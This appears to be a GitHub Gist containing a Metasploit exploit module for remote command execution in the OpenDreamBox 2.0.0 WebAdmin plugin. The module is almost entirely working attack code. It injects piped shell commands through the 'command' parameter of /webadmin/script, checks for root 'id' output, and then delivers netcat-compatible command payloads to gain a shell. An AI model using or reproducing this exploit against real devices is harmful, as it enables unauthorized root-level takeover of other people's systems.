Last active
December 25, 2017 11:39
-
-
Save danilabs/4c07e6e00b8e509e89baeb8181a9ea7f to your computer and use it in GitHub Desktop.
MSF Module. OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = GreatRanking | |
| include Msf::Exploit::Remote::HttpClient | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'OpenDreamBox 2.0.0 - Plugin WebAdmin RCE', | |
| 'Description' => %q{Remote Command Execution via Command injection in Plugin WebAdmin.}, | |
| 'Author' => | |
| [ | |
| 'Jonatas Fil <ctfninj4[at]gmail.com>', # Discovery, PoC | |
| 'Daniel Diez <danihzt[at]gmail.com>' # Metasploit module | |
| ], | |
| 'License' => MSF_LICENSE, | |
| 'References' => | |
| [ | |
| [ 'URL', 'https://www.dreamboxupdate.com' ], | |
| [ 'URL', 'https://www.exploit-db.com/exploits/42293/'] | |
| ], | |
| 'Platform' => %w{ linux unix }, | |
| 'Arch' => ARCH_CMD, | |
| 'Privileged' => true, | |
| 'Payload' => | |
| { | |
| 'Space' => 1024, | |
| 'DisableNops' => true, | |
| 'Compat' => | |
| { | |
| 'PayloadType' => 'cmd', | |
| 'RequiredCmd' => 'netcat generic' | |
| } | |
| }, | |
| 'Targets' => | |
| [ | |
| [ 'Automatic Target', { }] | |
| ], | |
| 'DefaultTarget' => 0, | |
| 'DisclosureDate' => 'Jul 03 2017' | |
| )) | |
| end | |
| def check | |
| begin | |
| res = send_request_cgi( | |
| { | |
| 'uri' => normalize_uri("webadmin", "script"), | |
| 'method' => 'GET', | |
| 'vars_get' => { | |
| "command" => "| id" | |
| } | |
| }) | |
| if res && res.body | |
| if /uid=0\(root\) gid=0\(root\)/ =~ res.body | |
| Exploit::CheckCode::Vulnerable | |
| else | |
| Exploit::CheckCode::Safe | |
| end | |
| else | |
| Exploit::CheckCode::Safe | |
| end | |
| rescue ::Rex::ConnectionError | |
| fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") | |
| end | |
| end | |
| def exploit | |
| print_status("#{rhost}:#{rport} - Sending remote command.") | |
| begin | |
| send_request_cgi( | |
| { | |
| 'uri' => normalize_uri("webadmin", "script"), | |
| 'method' => 'GET', | |
| 'vars_get' => { | |
| "command" => "| #{payload.encoded}" | |
| } | |
| }) | |
| rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT | |
| fail_with(Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting") | |
| end | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment